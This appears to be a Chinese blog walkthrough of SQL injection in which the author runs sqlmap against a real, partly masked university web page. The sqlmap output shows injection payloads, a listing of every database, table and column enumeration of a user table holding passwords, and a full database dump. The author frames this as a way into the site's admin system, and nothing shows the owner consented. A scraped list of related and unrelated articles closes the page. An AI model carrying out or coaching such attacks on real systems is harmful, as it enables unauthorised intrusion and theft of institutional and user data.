SQL注入是啥就不解释了。下面演示一个SQL注入的例子

SQL注入点可以自己尝试或用SQL注入漏洞扫描工具去寻找,这里用大名鼎鼎的sqlmap演示一个现成的案例。

1.漏洞试探

root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool

    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at ::

[::] [INFO] resuming back-end DBMS 'microsoft sql server'

[::] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of  HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: id='; WAITFOR DELAY '::'--

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: id=' WAITFOR DELAY '::'--

---

[::] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows  or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server

[::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at ::

可以看到这个站点是有SQL注入点的,连系统/应用/sql类型都爆出来了。接下来我们来探索一下这个数据库里有些什么。

2.查看数据库

root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 --dbs

    ...

sqlmap identified the following injection points with a total of  HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: id='; WAITFOR DELAY '::'--

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: id=' WAITFOR DELAY '::'--

---

[::] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows  or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server

[::] [INFO] fetching database names

[::] [INFO] fetching number of databases

[::] [INFO] resumed:

[::] [INFO] resumed: BZBB_lw

[::] [INFO] resumed: ChualgXinNS

[::] [INFO] resumed: db_dike

[::] [INFO] resumed: db_dndqjzw

[::] [INFO] resumed: db_njsdjw

[::] [INFO] resumed: db_njsfsy

[::] [INFO] resumed: db_nsddlhj

[::] [INFO] resumed: db_nsdhgxn

[::] [INFO] resumed: db_nsdmba

[::] [INFO] resumed: db_nsdMediaC

[::] [INFO] resumed: db_nsdscw

[::] [INFO] resumed: db_nsdsw

[::] [INFO] resumed: db_nsdswyy

[::] [INFO] resumed: db_nsdswzy

[::] [INFO] resumed: db_nyspjc

[::] [INFO] resumed: db_sdjxjy

[::] [INFO] resumed: db_spaqjc

[::] [INFO] resumed: JiaoCai

[::] [INFO] resumed: maste@

[::] [INFO] resumed: MBA

[::] [INFO] resumed: model

[::] [INFO] resumed: msdb

[::] [INFO] resumed: njnulab

[::] [INFO] resumed: njnupj

[::] [INFO] resumed: nju

[::] [INFO] resumed: nju2222

[::] [INFO] resumed: njuold

[::] [INFO] resumed: njupj2012

[::] [INFO] resumed: Northwind

[::] [INFO] resumed: NSD_ApplicationChemical

[::] [INFO] resumed: NSD_Cnooc

[::] [INFO] resumed: NSD_ElectricalEngineering

[::] [INFO] resumed: NSD_ElectronicInformation

[::] [INFO] resumed: NSD_TeacherSkills

[::] [INFO] resumed: NSD_TeachingTeam

[::] [INFO] resumed: nsddky_sy

[::] [INFO] resumed: nsdsfjdzx

[::] [INFO] resumed: nsdsfjdzxnew

[::] [INFO] resumed: nsglxt

[::] [INFO] resumed: NSHuaKe

[::] [INFO] resumed: NSXinLiXue

[::] [INFO] resumed: NY_JG

[::] [INFO] resumed: pubs

[::] [INFO] resumed: ShangXueYuannew

[::] [INFO] resumed: tempdb

[::] [INFO] resumed: zhongxin

[::] [INFO] resumed: zhongxinold

available databases []:

[*] BZBB_lw

[*] ChualgXinNS

[*] db_dike

[*] db_dndqjzw

[*] db_njsdjw

[*] db_njsfsy

[*] db_nsddlhj

[*] db_nsdhgxn

[*] db_nsdmba

[*] db_nsdMediaC

[*] db_nsdscw

[*] db_nsdsw

[*] db_nsdswyy

[*] db_nsdswzy

[*] db_nyspjc

[*] db_sdjxjy

[*] db_spaqjc

[*] JiaoCai

[*] maste@

[*] MBA

[*] model

[*] msdb

[*] njnulab

[*] njnupj

[*] nju

[*] nju2222

[*] njuold

[*] njupj2012

[*] Northwind

[*] NSD_ApplicationChemical

[*] NSD_Cnooc

[*] NSD_ElectricalEngineering

[*] NSD_ElectronicInformation

[*] NSD_TeacherSkills

[*] NSD_TeachingTeam

[*] nsddky_sy

[*] nsdsfjdzx

[*] nsdsfjdzxnew

[*] nsglxt

[*] NSHuaKe

[*] NSXinLiXue

[*] NY_JG

[*] pubs

[*] ShangXueYuannew

[*] tempdb

[*] zhongxin

[*] zhongxinold

[::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at ::

3.省略部分日志,可以看到所有的数据库都已经找到了,接下来可以查看具体的表。

root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D JiaoCai --tables --threads 5

...

[::] [INFO] resuming back-end DBMS 'microsoft sql server'

[::] [INFO] testing connection to the target URL

sqlmap identified the following injection points with a total of  HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: id='; WAITFOR DELAY '::'--

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: id=' WAITFOR DELAY '::'--

---

[::] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows  or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server

[::] [INFO] fetching tables for database: JiaoCai

[::] [INFO] fetching number of tables for database 'JiaoCai'

[::] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval

[::] [INFO] retrieved:

[::] [WARNING] reflective value(s) found and filtering out

[::] [INFO] retrieved: dbo.dtproperties

[::] [INFO] retrieved: dbo.sysconstraints

[::] [INFO] retrieved: dbo.syssegments

[::] [INFO] retrieved: dbo.T_BuildYxJc

[::] [INFO] retrieved: dbo.T_BuildZdJc

[::] [INFO] retrieved: dbo.T_CanYu

[::] [INFO] retrieved: dbo.T_EndDate

[::] [INFO] retrieved: dbo.T_G_BuildYxJc

[::] [INFO] retrieved: dbo.T_G_Bu

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

ildZdJc

[::] [INFO] retrieved: dbo.T_G_Ca

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

nYu

[::] [INFO] retrieved: dbo.T_G_EndDate

[::] [INFO] retrieved: dbo.T_G_JiaoCai

[::] [INFO] retrieved: dbo.T_G_News

[::] [INFO] retrieved: dbo.T_G_User

[::] [INFO] retrieved: dbo.T_G_XueYuan

[::] [INFO] retrieved: dbo.T_G_ZhuanYe

[::] [INFO] retrieved: dbo.T_G_ZyToJc

[::] [INFO] retrieved: dbo.T_JiaoCai

[::] [INFO] retrieved: dbo.T_News

[::] [INFO] retrieved: dbo.T_U

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

ser

[::] [INFO] retrieved: dbo.T_XueYuan

[::] [INFO] retrieved: dbo.T_ZhuanYe

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[::] [INFO] retrieved: dbo.T_ZyToJc

Database: JiaoCai

[ tables]

+----------------+

| T_BuildYxJc    |

| T_BuildZdJc    |

| T_CanYu        |

| T_EndDate      |

| T_G_BuildYxJc  |

| T_G_BuildZdJc  |

| T_G_CanYu      |

| T_G_EndDate    |

| T_G_JiaoCai    |

| T_G_News       |

| T_G_User       |

| T_G_XueYuan    |

| T_G_ZhuanYe    |

| T_G_ZyToJc     |

| T_JiaoCai      |

| T_News         |

| T_User         |

| T_XueYuan      |

| T_ZhuanYe      |

| T_ZyToJc       |

| dtproperties   |

| sysconstraints |

| syssegments    |

+----------------+

[::] [WARNING] HTTP error codes detected during run:

 (Internal Server Error) -  times

[::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at ::

4.找到自己想要的表,如果你找到了存放user和passwd的表,那么你就可以后台登录他们的管理系统了。

root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew -T T_User --columns --threads 5

 ...

HTTP(s) requests:

---

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: AND boolean-based blind - WHERE or HAVING clause

    Payload: id=' AND 8841=8841 AND 'bZbc'='bZbc

    Type: stacked queries

    Title: Microsoft SQL Server/Sybase stacked queries

    Payload: id='; WAITFOR DELAY '::'--

    Type: AND/OR time-based blind

    Title: Microsoft SQL Server/Sybase time-based blind

    Payload: id=' WAITFOR DELAY '::'--

---

[::] [INFO] the back-end DBMS is Microsoft SQL Server

web server operating system: Windows  or XP

web application technology: ASP.NET, Microsoft IIS 6.0, ASP

back-end DBMS: Microsoft SQL Server

[::] [INFO] fetching columns for table 'T_User' in database 'ShangXueYuannew'

[::] [INFO] retrieved:

[::] [WARNING] reflective value(s) found and filtering out

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: FileTheme

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: varchar

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: Pwd

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: varchar

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: Role

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: varchar

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: UserFile

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: varchar

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: UserId

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: varcha_ / (%)

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[::] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[::] [INFO] retrieved: varchar

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: UserName

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: va_cha_ / (%)

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[::] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request

[::] [INFO] retrieved: varchar

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: UserNo

[::] [INFO] retrieving the length of query output

[::] [INFO] retrieved:

[::] [INFO] retrieved: int

Database: ShangXueYuannew

Table: T_User

[ columns]

+-----------+---------+

| Column    | Type    |

+-----------+---------+

| FileTheme | varchar |

| Pwd       | varchar |

| Role      | varchar |

| UserFile  | varchar |

| UserId    | varchar |

| UserName  | varchar |

| UserNo    | int     |

+-----------+---------+

[::] [WARNING] HTTP error codes detected during run:

 (Internal Server Error) -  times

[::] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/xxx.njnu.edu.cn'

[*] shutting down at ::

5.甚至你可以把想要的数据库下载下来,在本地慢慢研究

root@kali:~# sqlmap -u http://xxx.njnu.edu.cn/fjlist.asp?id=87 -D ShangXueYuannew --dump --threads 5

时间相当长,完了后就能看到SQL的具体内容了。

Database: ShangXueYuannew

Table: T_Acceptance

[ entries]

+-----+-----+------------+------------+------------+------------+---------------------------+--------+

| aId | aNo | aRar       | aPdf       | aWord      | aFlash     | aTitle                    | aState |

+-----+-----+------------+------------+------------+------------+---------------------------+--------+

| NULL |    | .rar | NULL       | NULL       | NULL       | NULL                      | -   |

|    |   | NULL       | .pdf | .doc | .swf | 江苏省高等学校实验教学示范中心2011年验收申请表 | -   |

|    |   | NULL       | .pdf | .doc | .swf | 江苏省高等学校基础课实验教学示范中心立项申报表   | -   |

|    |   | NULL       | .pdf | .doc | .swf | 支撑材料之一:经济管理教学实验中心整体介绍     | -   |

|    |   | NULL       | .pdf | .doc | .swf | 支撑材料之二:实验室相关政策措施及规章制度     | -   |

|    |   | NULL       | .pdf | .doc | .swf | 支撑材料之三:课程实验教学计划及实验项目      | -   |

|    |   | NULL       | .pdf | .doc | .swf | 支撑材料之四:典型自编课程实验讲义         | -   |

|    |   | NULL       | .pdf | .doc | .swf | 支撑材料之五:典型多媒体课件简介          | -   |

|    |   | NULL       | .pdf | .doc | .swf | 支撑材料之߸ߢ经济ߢ理教学实验中心建设成果     | -   |

| NULL |    | .rar | NULL       | NULL       | NULL       | NULL                      | -   |

+-----+-----+------------+------------+------------+------------+---------------------------+--------+

实战SQL注入的更多相关文章

  1. 【Hibernate实战】源码解析Hibernate参数绑定及PreparedStatement防SQL注入原理

        本文采用mysql驱动是5.1.38版本. 本篇文章涉及内容比较多,单就Hibernate来讲就很大,再加上数据库驱动和数据库相关,非一篇文章或一篇专题就能说得完.本文从使用入手在[Spr ...

  2. 渗透测试初学者的靶场实战 1--墨者学院SQL注入—布尔盲注

    前言 大家好,我是一个渗透测试的爱好者和初学者,从事网络安全相关工作,由于爱好网上和朋友处找了好多关于渗透的视频.工具等资料,然后自己找了一个靶场,想把自己练习的体会和过程分享出来,希望能对其他渗透爱 ...

  3. SpringBoot微服务电商项目开发实战 --- api接口安全算法、AOP切面及防SQL注入实现

    上一篇主要讲了整个项目的子模块及第三方依赖的版本号统一管理维护,数据库对接及缓存(Redis)接入,今天我来说说过滤器配置及拦截设置.接口安全处理.AOP切面实现等.作为电商项目,不仅要求考虑高并发带 ...

  4. 渗透测试初学者的靶场实战 3--墨者学院SQL注入—宽字节盲注

    墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...

  5. 渗透测试初学者的靶场实战 2--墨者学院SQL注入—报错盲注

    墨者SQL注入-MYSQL数据库实战环境 实践步骤 1. 决断注入点 输入单引号,提示错误信息: 输入and 1=1 返回页面正常: 输入 and 1=2 返回正常 输入-1,返回异常: 2. 带入s ...

  6. [红日安全]Web安全Day1 - SQL注入实战攻防

    本文由红日安全成员: Aixic 编写,如有不当,还望斧正. 大家好,我们是红日安全-Web安全攻防小组.此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名 ...

  7. 从原理—实战分析SQL注入

    前言 SQL注入是web安全中最常见的攻击方式,SQL注入有很多方法,但如果只知道payload或只用用sqlmap,不知道原理,感觉也很难掌握,这次就总结一下我所遇到的SQL注入方法,原理分析+题目 ...

  8. 【攻防实战】SQL注入演练!

    这篇文章目的是让初学者利用SQL注入技术来解决他们面临的问题, 成功的使用它们,并在这种攻击中保护自己. 1.0 介绍 当一台机器只打开了80端口, 你最依赖的漏洞扫描器也不能返回任何有用的内容, 并 ...

  9. [漏洞案例]thinkcmf 2.x从sql注入到getshell实战

    0X00 前言 这个案例是某项目的漏洞,涉及敏感的地方将会打码. 很久没更新博客了,放一篇上来除除草,新的一年会有所转变,以后会有更多领域的研究. 下面是正文 0X01 正文 某厂商某个网站用的是th ...

随机推荐

  1. git使用详细介绍

    1. Git概念 1.1. Git库中由三部分组成        Git 仓库就是那个.git 目录,其中存放的是我们所提交的文档索引内容,Git 可基于文档索引内容对其所管理的文档进行内容追踪,从而 ...

  2. MAVEN中的插件放在哪个dependcies里面

    如果你用maven来管理项目的话,你会发现你要依赖很多plugin,于是引出了一个问题. 一个project中可能有两个<dependcies>这个tag, 如下 <dependci ...

  3. iOS UITableView , UITableViewController ,UITableViewCell实现全国各省市遍历,选择相应的地区

    我们先看一下效果                   代码如下 首先是第一个页面 rootTableViewController.h #import <UIKit/UIKit.h> #im ...

  4. IOS开发之Bug--关于C语言数组的容量参数

    这个错误之前没遇过,蛮奇葩的错误,只是一开始不了解,因为它折腾了许久. 先简单概括一下,以后有时间整理一下: 对应创建C语言的byte数组,我一开始使用:Byte b[PROTOCOL_CACHE_B ...

  5. 如何恢复Mysql数据库

    这里说的MySql恢复数据库,是指没有通过正常备份的情况下,通过Mysql保存的数据文件如何恢复数据库. 由于在一台测试机器上打算重新安装Mysql数据库,由于简单粗暴的直接卸载了,没有备份公司Dis ...

  6. mysql优化案例分析

    本文总结了一些工作常见的sql优化例子,虽然比较简单,但很实用,希望对大家有所帮助.sql优化一般分为两类,一类是sql本身的优化,如何走到合适的索引,如何减少排序,减少逻辑读:另一类是sql本身没有 ...

  7. SQL Server:字符串函数

    以下所有例子均Studnet表为例: 1. len():计算字符串长度 len()用来计算字符串的长度,每个中文汉字或英文字母都为一个长度 select sname, len(sname) from ...

  8. .NET框架设计(常被忽视的框架设计技巧)

    阅读目录: 1.开篇介绍 2.元数据缓存池模式(在运行时构造元数据缓存池) 2.1.元数据设计模式(抽象出对数据的描述数据) 2.2.借助Dynamic来改变IOC.AOP动态绑定的问题 2.3.元数 ...

  9. Java api 入门教程 之 JAVA的SYSTEM类

    System类代表系统,系统级的很多属性和控制方法都放置在该类的内部.该类位于java.lang包. 由于该类的构造方法是private的,所以无法创建该类的对象,也就是无法实例化该类.其内部的成员变 ...

  10. main()函数的完整形式

    初学C语言都觉得main作为整个程序的入口函数是不需要传递参数的,但事实上,我们完全可以给main()传入参数进而控制整个程序的执行,就像我们使用DOS命令传入的参数一样,这里面argc表示传入的参数 ...